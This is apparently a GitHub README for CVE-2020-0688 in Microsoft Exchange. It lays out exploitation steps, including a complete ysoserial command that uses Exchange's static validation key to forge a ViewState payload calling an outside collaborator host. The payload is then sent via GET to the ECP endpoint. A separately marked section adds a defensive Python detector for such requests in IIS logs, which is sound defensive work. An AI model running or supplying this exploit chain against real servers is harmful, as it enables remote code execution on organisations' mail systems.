Latest commit d3d5581 Feb 26, 2020

cve-2020-0688

Log in as any user with an email address; the privilege level is nothing to worry about.

- Grab `__VIEWSTATEGENERATOR` from the page source.
- Grab the value of the `ASP.NET_SessionId` cookie for the `viewstateuserkey` value.

Download YSO Here

```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy
```

Send a GET request to:

https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
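
Seen from the defender's side, the request above is distinctive: ASP.NET normally carries `__VIEWSTATE` in a POST body, so a GET to `/ecp/` with `__VIEWSTATE` in the query string stands out in IIS logs. The detector below is an added example, not part of this repository; the log lines are constructed, and the `#Fields` layout and the function name `find_viewstate_gets` are assumptions.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log sample (not from a real server); field layout is assumed.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2020-02-27 10:01:12 GET /ecp/default.aspx - CORP\\alice 10.0.0.5 200
2020-02-27 10:02:40 POST /ecp/default.aspx - CORP\\alice 10.0.0.5 200
2020-02-27 10:03:55 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=PLACEHOLDER CORP\\bob 203.0.113.7 500
2020-02-27 10:04:10 GET /owa/ - CORP\\bob 203.0.113.7 200
2020-02-27 10:05:00 GET /ECP/Default.aspx __viewstate=AAAA&x=1 - 198.51.100.9 302
"""

def find_viewstate_gets(log_text):
    """Return GET requests under /ecp/ that carry __VIEWSTATE in the query string."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names apply to the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue                       # skip rows that do not match the header
        row = dict(zip(fields, parts))
        if row.get("cs-method", "").upper() != "GET":
            continue
        # IIS paths are case-insensitive, so compare in lower case.
        if not row.get("cs-uri-stem", "").lower().startswith("/ecp/"):
            continue
        query = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        params = {k.lower(): v[0] for k, v in query.items()}
        if "__viewstate" in params:
            hits.append({
                "time": f'{row.get("date", "")} {row.get("time", "")}'.strip(),
                "client": row.get("c-ip"),
                "user": row.get("cs-username"),   # "-" means unauthenticated
                "status": row.get("sc-status"),
                "generator": params.get("__viewstategenerator"),
                "viewstate_len": len(params["__viewstate"]),
            })
    return hits

if __name__ == "__main__":
    for hit in find_viewstate_gets(SAMPLE_LOG):
        print(hit)
```

A hit is a lead for triage rather than proof of compromise; correlate it with the authenticated user, the response status and process creation on the server around the same time.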

exploit.py is untested and needs a demo system to fire up and play with.
